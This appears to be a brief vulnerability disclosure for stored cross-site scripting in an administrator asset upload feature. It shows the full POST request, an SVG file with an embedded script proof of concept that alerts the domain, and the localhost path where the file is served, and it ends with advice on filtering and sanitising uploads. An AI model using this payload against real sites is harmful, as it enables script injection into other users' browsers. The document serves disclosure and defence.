By uploading an SVG file containing JavaScript through the file upload function on the administrator screen, an attacker can execute arbitrary script in the browser of any user who accesses the uploaded file.
Log in to the administrator screen, access the Assets page, and upload the SVG file.
POST /admin/asset/add HTTP/1.1
...
-----------------------------32482956685473744651320483298
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------32482956685473744651320483298
...
The uploaded file is then served from:
http://localhost/files/asset/d6dbbeb510abf7a3498c0b8dbdbb61738a91ab06.svg
https://drive.google.com/file/d/1egSGIfDD9ZTitGCb9-bLVZmPdMqUPPyK/view?usp=sharing
Always filter uploaded files, restrict the accepted content types, and properly sanitize the content of any file that is accepted.